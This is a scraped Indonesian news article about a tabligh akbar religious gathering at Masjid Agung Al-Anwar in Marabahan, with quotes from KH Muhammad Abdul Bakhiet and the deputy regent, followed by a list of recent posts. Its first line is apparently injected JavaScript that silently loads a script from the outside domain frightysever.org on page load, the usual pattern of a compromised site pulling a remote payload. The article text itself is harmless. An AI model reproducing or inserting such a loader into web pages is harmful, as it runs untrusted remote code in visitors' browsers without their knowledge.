(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,'script','https://frightysever.org/Bgkc244P');
Kabupaten Barito Kuala

Tabligh Akbar di Marabahan Hadirkan Al-Mukarram KH Muhammad Abdul Bakhiet


KANALKALIMANTAN.COM, MARABAHAN – Kabupaten Barito Kuala kembali menggelar tabligh akbar, Sabtu (05/03/2022) malam. Kegiatan yang digelar di Mesjid Agung Al-Anwar ini menghadirkan penceramah Al-Mukarram KH Muhammad Abdul Bakhiet.

Dalam tausyiahnya KH Muhammad Abdul Bakhiet mengajak Jemaah yang hadir untuk mencintai mesjid, memakmurkan mesjid, meramaikan mesjid dengan kegiatan-kegiatan keagamaan, serta memperbanyak shalawat kepada Nabi Muhammad SAW terumata dibulan Sya’ban.

“Tempat yang paling dicintai Allah disebuah negeri adalah mesjid-mesjid, karena di mesjid itulah orang-orang berzikir kepada Allah, di mesjid itulah orang bershalawat kepada Rasul-Nya” ujarnya.

KH Muhammad Bakhiet mengatakan bahwa mesjid-mesjid merupakan rumah Allah dimuka bumi, oleh karena itu orang yang memasuki mesjid berarti dia berziarah kepada Allah dan Allah pasti memuliakan orang-orang yang berziarah kepada-Nya.

 

Baca juga  : Ketua Persit KCK Kodim 1001/HSU-BLG Minta Jajarannya Tetap Jalankan Prokes

“Di padang mahsyar itu sangat panas dan hanya ada naungan Allah SWT. Hanya ada 7 kelompok manusia yang mendapatkan naungan dari Allah di padang mahsyar nanti, diantara 7 kelompok itu adalah orang-orang yang menggantungkan hatinya di mesjid yaitu orang yang begitu meninggalkan mesjid ia memiliki niat akan ke masjid lagi,” tambahnya.

Sebelumnya, Bupati Barito Kuala Hj Noormiliyani dalam sambutanyang disampaikan Wakil Bupati H Rahmadian Noor mengatakan, selain menjadi sarana untuk mempererat tali silaturahmi serta memperkokoh rasa kebersamaan, melalui tabligh akbar ini merupakan salah satu bentuk syiar Islam yang merupakan pencerminan dari kehidupan masyakarat kita yang agamis.

Rahmadian Noor juga mengajak untuk bermunajat agar terbebas dari segala wabah, dijauhkan dari segala musibah dan bencana, segera bangkit dan optimis bahwa semua ini bisa kita lewati bersama.

“Mari kita evaluasi dan introspeksi diri sudah sejauh mana berbuat dan menjalanakan tugas sebagai hamba Allah dan sebagai masyarakat serta warga negara yang baik,” ingatnya.

Di kegiatan tabligh akbar ini, tim Dinas Komunikasi dan Informatika Kab. Batola kembali ikut berperan serta dengan mengadakan live streaming pada channel youtube resmi Diskominfo. Agar mereka yang tidak bisa berhadir tetap dapat menyaksikan tabligh akbar ini. (kanalkalimantan.com/rdy)

Reporter  : rdy
Editor  : kk


Desy Arfianty

Recent Posts

Orangtua Pusing, ‘Bermewah-mewahan’ Perpisahan Anak Sekolah di Banjarbaru

Kadisdik: Silakan Perpisahan di Sekolah dan Dilakukan dengan Sederhana Read More

8 jam ago

Bappedalitbang Banjar Gelar Rapat Pembahasan Data Indikator Makro Pembangunan RPJPD

KANALKALIMANTAN.COM, MARTAPURA – Badan Perencanaan Pembangunan Daerah, Penelitian dan Pengembangan (Bappedalitbang) Kabupaten Banjar melaksanakan rapat Pembahasan… Read More

8 jam ago

Pergantian Perwira di Polres Banjarmasin, Ini Nama dan Jabatannya

KANALKALIMANTAN.COM, BANJARMASIN - Sejumlah perwira menengah (Pamen) dan perwira pertama (Pama) di lingkungan Kepolisian Resor… Read More

8 jam ago

O2SN dan FLS2N 2024 SD MI Tingkat Kabupaten Kapuas Digelar

KANALKALIMANTAN.COM, KUALA KAPUAS - Ratusan pelajar tingkat SD/MI di Kabupaten Kapuas antusias mengikuti upacara pembukaan… Read More

9 jam ago

Bangun Posyandu di Lokasi TMMD Desa Sungai Karias

KANALKALIMANTAN.COM, AMUNTAI - Pembangunan Pos Pelayanan Terpadu (Posyandu) tak luput dari sasaran Satgas TNI Manunggal… Read More

9 jam ago

Kelurahan Guntung Manggis Membidik Juara Kampung Keluarga Berkualitas Nasional

KANALKALIMANTAN.COM, BANJARBARU - Kampung Keluarga Berkualitas (KB) di Kelurahan Guntung Manggis menerima kunjungan Tim Penilai… Read More

9 jam ago

This website uses cookies.